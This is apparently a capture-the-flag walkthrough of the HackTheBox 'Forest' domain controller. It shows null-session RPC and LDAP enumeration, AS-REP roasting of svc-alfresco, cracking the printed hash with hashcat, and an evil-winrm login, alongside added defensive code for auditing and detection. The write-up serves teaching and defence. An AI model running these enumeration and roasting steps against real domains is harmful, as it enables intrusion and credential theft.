HTB - Forest


Nmap Scan

Performing nmap scan on the target machine,

┌──(kaliaidenpearce369)-[~]
└─$ nmap -sV -sC -A 10.10.10.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-27 02:17 EDT
Nmap scan report for 10.10.10.161
Host is up (0.26s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-27 06:30:47Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h30m58s, deviation: 4h02m30s, median: 10m58s
| smb2-time: 
|   date: 2022-03-27T06:31:20
|_  start_date: 2022-03-27T06:22:50
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2022-03-26T23:31:16-07:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 214.21 seconds

This looks like an Active Directory environment, with many domain services exposed on it

Scanning for services running in other ports,

┌──(kaliaidenpearce369)-[~]
└─$ nmap -p1-10000 -T4 10.10.10.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-27 02:37 EDT
Nmap scan report for 10.10.10.161
Host is up (0.24s latency).
Not shown: 9986 closed tcp ports (conn-refused)
PORT     STATE    SERVICE
53/tcp   open     domain
88/tcp   open     kerberos-sec
135/tcp  open     msrpc
139/tcp  open     netbios-ssn
389/tcp  open     ldap
445/tcp  open     microsoft-ds
464/tcp  open     kpasswd5
593/tcp  open     http-rpc-epmap
636/tcp  open     ldapssl
3268/tcp open     globalcatLDAP
3269/tcp open     globalcatLDAPssl
4793/tcp filtered unknown
5985/tcp open     wsman
9389/tcp open     adws

Nmap done: 1 IP address (1 host up) scanned in 328.70 seconds

Enumeration

From the nmap scan result, we can see that the machine belongs to a domain named htb.local

Port 5985/tcp (wsman) is open, which means PS-Remoting (WinRM) is enabled

We can also see 53/tcp (domain) and 389/tcp (ldap) open on this machine, which means the target is a Domain Controller

Enumerating SMB

For SMB service,

| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

So we can't perform relaying attacks here, since SMB signing is enabled and required

Enumerating SMB with smbmap and smbclient,

┌──(kaliaidenpearce369)-[~]
└─$ smbmap -H 10.10.10.161          
[+] IP: 10.10.10.161:445        Name: 10.10.10.161                                      
                                                                                                                                                             
┌──(kaliaidenpearce369)-[~]
└─$ smbmap -H 10.10.10.161 -u monish -p fake
[!] Authentication error on 10.10.10.161

┌──(kaliaidenpearce369)-[~]
└─$ smbclient -L //10.10.10.161 -N 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Anonymous login succeeds, but no shares are returned, so listing shares requires authentication

Enumerating RPC

Let's enumerate RPC over a null session (no password),

┌──(kaliaidenpearce369)-[~]
└─$ rpcclient 10.10.10.161 -U "" -N
rpcclient $> help
---------------         ----------------------
         MDSSVC
fetch_properties                Fetch connection properties
fetch_attributes                Fetch attribute

...

Since the null session lets us run rpcclient commands, we can enumerate the domain from here

Enumerating domain information,

rpcclient $> enumdomains
name:[HTB] idx:[0x0]
name:[Builtin] idx:[0x0]

Enumerating domain users,

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

Enumerating domain groups,

rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]

At least we got some basic information useful for passive enumeration; active enumeration through rpcclient requires authentication

We can also query details of a user account by passing its Relative Identifier (RID), in this case our Domain Admin, Administrator

rpcclient $> queryuser 0x1f4
        User Name   :   Administrator
        Full Name   :   Administrator
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :   Built-in account for administering the computer/domain
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Sun, 27 Mar 2022 02:23:35 EDT
        Logoff Time              :      Wed, 31 Dec 1969 19:00:00 EST
        Kickoff Time             :      Wed, 31 Dec 1969 19:00:00 EST
        Password last set Time   :      Mon, 30 Aug 2021 20:51:59 EDT
        Password can change Time :      Tue, 31 Aug 2021 20:51:59 EDT
        Password must change Time:      Wed, 13 Sep 30828 22:48:05 EDT
        unknown_2[0..31]...
        user_rid :      0x1f4
        group_rid:      0x201
        acb_info :      0x00000010
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000061
        padding1[0..7]...
        logon_hrs[0..21]...

Let's query the group details and its members, in this case for the Domain Admins group

rpcclient $> querygroup 0x200
        Group Name:     Domain Admins
        Description:    Designated administrators of the domain
        Group Attribute:7
        Num Members:1
rpcclient $> querygroupmem 0x200
        rid:[0x1f4] attr:[0x7]

Enumerating LDAP

Since the LDAP service is running, let's try to query it with an anonymous/null bind

Running ldapsearch,

┌──(kaliaidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.161  -D "DC=htb,DC=local" -b "DC=htb,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=htb,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# htb.local
dn: DC=htb,DC=local
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=htb,DC=local
instanceType: 5
whenCreated: 20190918174549.0Z
whenChanged: 20220327062240.0Z
subRefs: DC=ForestDnsZones,DC=htb,DC=local
subRefs: DC=DomainDnsZones,DC=htb,DC=local
subRefs: CN=Configuration,DC=htb,DC=local
uSNCreated: 4099
dSASignature:: AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAOqNrI1l5QUq5WV+CaJoIcQ==
uSNChanged: 888873
name: htb
objectGUID:: Gsfw30mpJkuMe1Lj4stuqw==

...

So anonymous/null binding works,

Let's try passing custom queries to enumerate further,

Searching for the entries under the Users container,

┌──(kaliaidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.161  -D "DC=htb,DC=local" -b "CN=Users,DC=htb,DC=local"  | grep dn
dn: CN=Users,DC=htb,DC=local
dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=htb,DC=local
dn: CN=Denied RODC Password Replication Group,CN=Users,DC=htb,DC=local
dn: CN=Read-only Domain Controllers,CN=Users,DC=htb,DC=local
dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=htb,DC=local
dn: CN=Cloneable Domain Controllers,CN=Users,DC=htb,DC=local
dn: CN=Protected Users,CN=Users,DC=htb,DC=local
dn: CN=Key Admins,CN=Users,DC=htb,DC=local
dn: CN=Enterprise Key Admins,CN=Users,DC=htb,DC=local
dn: CN=DnsAdmins,CN=Users,DC=htb,DC=local
dn: CN=DnsUpdateProxy,CN=Users,DC=htb,DC=local
dn: CN=Exchange Online-ApplicationAccount,CN=Users,DC=htb,DC=local
dn: CN=SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1},CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c},CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9},CN=Users,DC=htb,DC=
dn: CN=DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852},CN=Users,
dn: CN=Migration.8f3e7716-2011-43e4-96b1-aba62d229136,CN=Users,DC=htb,DC=local
dn: CN=FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042,CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201},CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA},CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9},CN=Users,DC=htb,DC=
dn: CN=Administrator,CN=Users,DC=htb,DC=local
dn: CN=Guest,CN=Users,DC=htb,DC=local
dn: CN=DefaultAccount,CN=Users,DC=htb,DC=local
dn: CN=krbtgt,CN=Users,DC=htb,DC=local
dn: CN=Domain Computers,CN=Users,DC=htb,DC=local
dn: CN=Domain Controllers,CN=Users,DC=htb,DC=local
dn: CN=Schema Admins,CN=Users,DC=htb,DC=local
dn: CN=Enterprise Admins,CN=Users,DC=htb,DC=local
dn: CN=Cert Publishers,CN=Users,DC=htb,DC=local
dn: CN=Domain Admins,CN=Users,DC=htb,DC=local
dn: CN=Domain Users,CN=Users,DC=htb,DC=local
dn: CN=Domain Guests,CN=Users,DC=htb,DC=local
dn: CN=Group Policy Creator Owners,CN=Users,DC=htb,DC=local
dn: CN=RAS and IAS Servers,CN=Users,DC=htb,DC=local

And these are the account names present in this domain,

┌──(kaliaidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.161  -D "DC=htb,DC=local" -b "DC=htb,DC=local" -W "(|(objectClass=person)(objectClass=user))" sAMAccountName | grep sAM
Enter LDAP Password: 
# requesting: sAMAccountName 
sAMAccountName: Guest
sAMAccountName: DefaultAccount
sAMAccountName: FOREST$
sAMAccountName: EXCH01$
sAMAccountName: $331000-VK4ADACQNUCA
sAMAccountName: SM_2c8eef0a09b545acb
sAMAccountName: SM_ca8c2ed5bdab4dc9b
sAMAccountName: SM_75a538d3025e4db9a
sAMAccountName: SM_681f53d4942840e18
sAMAccountName: SM_1b41c9286325456bb
sAMAccountName: SM_9b69f1b9d2cc45549
sAMAccountName: SM_7c96b981967141ebb
sAMAccountName: SM_c75ee099d0a64c91b
sAMAccountName: SM_1ffab36a2f5f479cb
sAMAccountName: HealthMailboxc3d7722
sAMAccountName: HealthMailboxfc9daad
sAMAccountName: HealthMailboxc0a90c9
sAMAccountName: HealthMailbox670628e
sAMAccountName: HealthMailbox968e74d
sAMAccountName: HealthMailbox6ded678
sAMAccountName: HealthMailbox83d6781
sAMAccountName: HealthMailboxfd87238
sAMAccountName: HealthMailboxb01ac64
sAMAccountName: HealthMailbox7108a4e
sAMAccountName: HealthMailbox0659cc1
sAMAccountName: sebastien
sAMAccountName: lucinda
sAMAccountName: andy
sAMAccountName: mark
sAMAccountName: santi

Let's try the impacket tools for more detailed output

Using impacket-GetADUsers to list all users in the domain,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-GetADUsers htb.local/ -dc-ip 10.10.10.161 -no-pass -all
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Querying 10.10.10.161 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator         Administrator@htb.local         2021-08-30 20:51:58.690463  2022-03-27 02:23:35.195845 
Guest                                                 <never>              <never>             
DefaultAccount                                        <never>              <never>             
krbtgt                                                2019-09-18 06:53:23.467452  <never>             
$331000-VK4ADACQNUCA                                  <never>              <never>             
SM_2c8eef0a09b545acb  SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.local  <never>              <never>             
SM_ca8c2ed5bdab4dc9b  SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@htb.local  <never>              <never>             
SM_75a538d3025e4db9a  SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@htb.local  <never>              <never>             
SM_681f53d4942840e18  DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@htb.local  <never>              <never>             
SM_1b41c9286325456bb  Migration.8f3e7716-2011-43e4-96b1-aba62d229136@htb.local  <never>              <never>             
SM_9b69f1b9d2cc45549  FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@htb.local  <never>              <never>             
SM_7c96b981967141ebb  SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@htb.local  <never>              <never>             
SM_c75ee099d0a64c91b  SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@htb.local  <never>              <never>             
SM_1ffab36a2f5f479cb  SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@htb.local  <never>              <never>             
HealthMailboxc3d7722  HealthMailboxc3d7722415ad41a5b19e3e00e165edbe@htb.local  2019-09-23 18:51:31.892097  2019-09-23 18:57:12.361516 
HealthMailboxfc9daad  HealthMailboxfc9daad117b84fe08b081886bd8a5a50@htb.local  2019-09-23 18:51:35.267114  2019-09-23 18:52:05.736012 
HealthMailboxc0a90c9  HealthMailboxc0a90c97d4994429b15003d6a518f3f5@htb.local  2019-09-19 07:56:35.206329  <never>             
HealthMailbox670628e  HealthMailbox670628ec4dd64321acfdf6e67db3a2d8@htb.local  2019-09-19 07:56:45.643993  <never>             
HealthMailbox968e74d  HealthMailbox968e74dd3edb414cb4018376e7dd95ba@htb.local  2019-09-19 07:56:56.143969  <never>             
HealthMailbox6ded678  HealthMailbox6ded67848a234577a1756e072081d01f@htb.local  2019-09-19 07:57:06.597012  <never>             
HealthMailbox83d6781  HealthMailbox83d6781be36b4bbf8893b03c2ee379ab@htb.local  2019-09-19 07:57:17.065809  <never>             
HealthMailboxfd87238  HealthMailboxfd87238e536e49e08738480d300e3772@htb.local  2019-09-19 07:57:27.487679  <never>             
HealthMailboxb01ac64  HealthMailboxb01ac647a64648d2a5fa21df27058a24@htb.local  2019-09-19 07:57:37.878559  <never>             
HealthMailbox7108a4e  HealthMailbox7108a4e350f84b32a7a90d8e718f78cf@htb.local  2019-09-19 07:57:48.253341  <never>             
HealthMailbox0659cc1  HealthMailbox0659cc188f4c4f9f978f6c2142c4181e@htb.local  2019-09-19 07:57:58.643994  <never>             
sebastien                                             2019-09-19 20:29:59.544725  2019-09-22 18:29:29.586227 
lucinda                                               2019-09-19 20:44:13.233891  <never>             
svc-alfresco                                          2022-03-27 03:22:03.296517  2019-09-23 07:09:47.931194 
andy                                                  2019-09-22 18:44:16.291082  <never>             
mark                                                  2019-09-20 18:57:30.243568  <never>             
santi                                                 2019-09-20 19:02:55.134828  <never> 

Further enumeration shows that there are no SPNs and that the host runs a 64-bit architecture

┌──(kaliaidenpearce369)-[~]
└─$ impacket-GetUserSPNs  htb.local/ -dc-ip 10.10.10.161 -no-pass 
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

No entries found!
                                                                                                                                                             
┌──(kaliaidenpearce369)-[~]
└─$ impacket-getArch -target 10.10.10.161                                      
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Gathering OS architecture for 1 machines
[*] Socket connect timeout set to 2 secs
10.10.10.161 is 64-bit

Initial Access

Let's search for a user that has the DONT_REQUIRE_PREAUTH flag set, since such an account makes ASREP-Roasting possible

Searching for users with the DONT_REQUIRE_PREAUTH UAC flag,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161         
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Name          MemberOf                                                PasswordLastSet             LastLogon                   UAC      
------------  ------------------------------------------------------  --------------------------  --------------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2022-03-27 03:28:19.172241  2019-09-23 07:09:47.931194  0x410200 
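
The UAC column above is a raw userAccountControl bitmask, so it is worth knowing what 0x410200 actually encodes. The following Python is an added example, not part of the original write-up or of impacket: it decodes the value into flag names using the documented userAccountControl bit values, flags the bits a defender would review, and builds the LDAP bitwise filter (matching rule 1.2.840.113556.1.4.803) an administrator can use with ldapsearch to audit the whole domain for accounts that do not require pre-authentication.

```python
"""Decode a userAccountControl value and flag risky bits.

Added example (not from the original write-up): decodes the UAC value
0x410200 that GetNPUsers reported for svc-alfresco and builds the LDAP
filter an administrator can use to audit the domain for the same flag.
"""

# Subset of userAccountControl bits (values as documented by Microsoft).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# Bits a defender normally wants to review on any enabled account.
RISKY_BITS = {0x0020, 0x80000, 0x400000, 0x1000000}

# OID of the LDAP_MATCHING_RULE_BIT_AND extensible match used by AD.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def decode_uac(value):
    """Return the list of flag names set in a userAccountControl value."""
    names = [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]
    unknown = value & ~sum(UAC_FLAGS)
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:x}")
    return names


def risky_flags(value):
    """Return the risky flag names set; disabled accounts are skipped."""
    if value & 0x0002:
        return []
    return [UAC_FLAGS[bit] for bit in sorted(RISKY_BITS) if value & bit]


def audit_filter(bit):
    """Build an LDAP filter matching user objects with the given UAC bit set."""
    return (f"(&(objectCategory=person)(objectClass=user)"
            f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={bit}))")


if __name__ == "__main__":
    uac = 0x410200  # value shown in the GetNPUsers output for svc-alfresco
    print(decode_uac(uac))
    print(risky_flags(uac))
    print(audit_filter(0x400000))
```

For 0x410200 the decoder returns NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD and DONT_REQ_PREAUTH, which is exactly why GetNPUsers listed the account; the filter string can be pasted into an authenticated ldapsearch as a periodic audit so that such accounts are found by the administrators before anyone else.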

Requesting the AS-REP (TGT response) for that account so it can be cracked offline to recover the plaintext password,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-GetNPUsers htb.local/svc-alfresco -dc-ip 10.10.10.161  -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:10789994ae3d40e257d6c0e341ae6f8c$4112d63482946a571be87d25346e273412f1e2eefedaada1fbbd53eafd84b4234072c65cade3a75a6d4f0b27336d8fd8a34e6a0c892df2018ec81b3dd7777cb41f56266ef96257039e2f0698f9205c10ad29152a730d3c33d76c5e80c1a70ecc63298357541c87c1c13afb74e2388a912bd6666b3fa7e1ced044a117bd1b365bbc878b72cc181330082c01617077c2a17485dbbb7ae97b58d2317dbc667c540f6914140929dcb26c7b1148e29b9a47b30eafe1f11d461a8a61cce59e2c3295698ef1599b2412670fb1e4b70894eecf172deaa791cd407d0f76bb57ef92c68aeb8dd0ee55b3b9

Now cracking the hash with hashcat (mode 18200, Kerberos 5 AS-REP etype 23),

┌──(aidenpearce369ragnar)-[~]
└─$ hashcat -h | grep 18200
  18200 | Kerberos 5 AS-REP etype 23                       | Network Protocols
                                                                                                    
┌──(aidenpearce369ragnar)-[~]
└─$ hashcat -m 18200 '$krb5asrep$23$svc-alfresco@HTB.LOCAL:10789994ae3d40e257d6c0e341ae6f8c$4112d63482946a571be87d25346e273412f1e2eefedaada1fbbd53eafd84b4234072c65cade3a75a6d4f0b27336d8fd8a34e6a0c892df2018ec81b3dd7777cb41f56266ef96257039e2f0698f9205c10ad29152a730d3c33d76c5e80c1a70ecc63298357541c87c1c13afb74e2388a912bd6666b3fa7e1ced044a117bd1b365bbc878b72cc181330082c01617077c2a17485dbbb7ae97b58d2317dbc667c540f6914140929dcb26c7b1148e29b9a47b30eafe1f11d461a8a61cce59e2c3295698ef1599b2412670fb1e4b70894eecf172deaa791cd407d0f76bb57ef92c68aeb8dd0ee55b3b9' /opt/wordlists/rockyou.txt 
hashcat (v5.1.0) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: NVIDIA GeForce RTX 3050 Laptop GPU, 977/3910 MB allocatable, 16MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=1 -D VENDOR_ID=32 -D CUDA_ARCH=806 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=18200 -D _unroll'
* Device #1: Kernel m18200_a0-pure.089e1f35.kernel not found in cache! Building may take a while...


Dictionary cache hit:
* Filename..: /opt/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5asrep$23$svc-alfresco@HTB.LOCAL:10789994ae3d40e257d6c0e341ae6f8c$4112d63482946a571be87d25346e273412f1e2eefedaada1fbbd53eafd84b4234072c65cade3a75a6d4f0b27336d8fd8a34e6a0c892df2018ec81b3dd7777cb41f56266ef96257039e2f0698f9205c10ad29152a730d3c33d76c5e80c1a70ecc63298357541c87c1c13afb74e2388a912bd6666b3fa7e1ced044a117bd1b365bbc878b72cc181330082c01617077c2a17485dbbb7ae97b58d2317dbc667c540f6914140929dcb26c7b1148e29b9a47b30eafe1f11d461a8a61cce59e2c3295698ef1599b2412670fb1e4b70894eecf172deaa791cd407d0f76bb57ef92c68aeb8dd0ee55b3b9:s3rvice
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:10789994ae3d40...55b3b9
Time.Started.....: Sun Mar 27 12:56:43 2022 (1 sec)
Time.Estimated...: Sun Mar 27 12:56:44 2022 (0 secs)
Guess.Base.......: File (/opt/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 18155.2 kH/s (11.80ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4194304/14344385 (29.24%)
Rejected.........: 0/4194304 (0.00%)
Restore.Point....: 3145728/14344385 (21.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: tomabogu -> rogans
Hardware.Mon.#1..: Temp: 59c Util: 45% Core:1665MHz Mem:5500MHz Bus:4

Started: Sun Mar 27 12:56:39 2022
Stopped: Sun Mar 27 12:56:44 2022
                                    

So the password for the account HTB.LOCAL/svc-alfresco is s3rvice

Now let's use evil-winrm over PS-Remoting to get a shell,
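
From the defender's side, the AS-REP request made above does not go unnoticed: the domain controller logs a Security event 4768 (a Kerberos authentication ticket was requested) in which Pre-Authentication Type is 0, meaning no pre-authentication was performed, and Ticket Encryption Type is 0x17 (RC4-HMAC, the etype 23 of the $krb5asrep$23$ hash). The following Python is an added example, not part of the original write-up: it runs that detection logic over constructed sample records that use the real 4768 field names, and excludes computer accounts to reduce noise.

```python
"""Flag AS-REP roasting candidates in Kerberos TGT request events.

Added example (not part of the original write-up). A successful 4768
with PreAuthType 0 means the KDC answered an AS-REQ that carried no
pre-authentication data, which only happens for accounts that have
DONT_REQ_PREAUTH set; RC4 (0x17) makes the reply cheap to crack.
"""

import re

# Constructed sample 4768/4769 records, one per line, in a flattened
# key=value form of the event's XML fields (not real captured logs).
SAMPLE_LOG = """\
EventID=4768 TargetUserName=sebastien ServiceName=krbtgt IpAddress=10.10.14.4 TicketEncryptionType=0x12 PreAuthType=2 Status=0x0
EventID=4768 TargetUserName=svc-alfresco ServiceName=krbtgt IpAddress=10.10.14.4 TicketEncryptionType=0x17 PreAuthType=0 Status=0x0
EventID=4768 TargetUserName=lucinda ServiceName=krbtgt IpAddress=10.10.10.161 TicketEncryptionType=0x17 PreAuthType=2 Status=0x0
EventID=4769 TargetUserName=andy ServiceName=cifs/FOREST TicketEncryptionType=0x17 Status=0x0
EventID=4768 TargetUserName=FOREST$ ServiceName=krbtgt IpAddress=::1 TicketEncryptionType=0x12 PreAuthType=0 Status=0x0
"""

_KV = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one 'key=value key=value' record into a dict."""
    return dict(_KV.findall(line))


def is_asrep_roast_candidate(event):
    """True for a successful TGT request issued without pre-authentication.

    Computer accounts (name ending in '$') are excluded to cut noise;
    any remaining hit is a user account that should not exist in a
    well-configured domain, or a sign someone is harvesting AS-REPs.
    """
    return (event.get("EventID") == "4768"
            and event.get("Status") == "0x0"
            and event.get("PreAuthType") == "0"
            and event.get("TicketEncryptionType", "").lower() == "0x17"
            and not event.get("TargetUserName", "").endswith("$"))


def find_candidates(log_text):
    """Return (user, source ip) for each suspicious record in the log."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if is_asrep_roast_candidate(ev):
            hits.append((ev["TargetUserName"], ev.get("IpAddress", "?")))
    return hits


if __name__ == "__main__":
    for user, ip in find_candidates(SAMPLE_LOG):
        print(f"AS-REP without pre-auth for {user} from {ip}")
```

Only the svc-alfresco record trips the rule; the first record shows a normal pre-authenticated request, the lucinda record has RC4 but pre-auth type 2, the 4769 line is a service ticket rather than a TGT, and the computer account is dropped by the name check. The same logic is easily expressed as a SIEM query once the field names are mapped.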

┌──(kaliaidenpearce369)-[~]
└─$ evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161 

Evil-WinRM shell v3.3

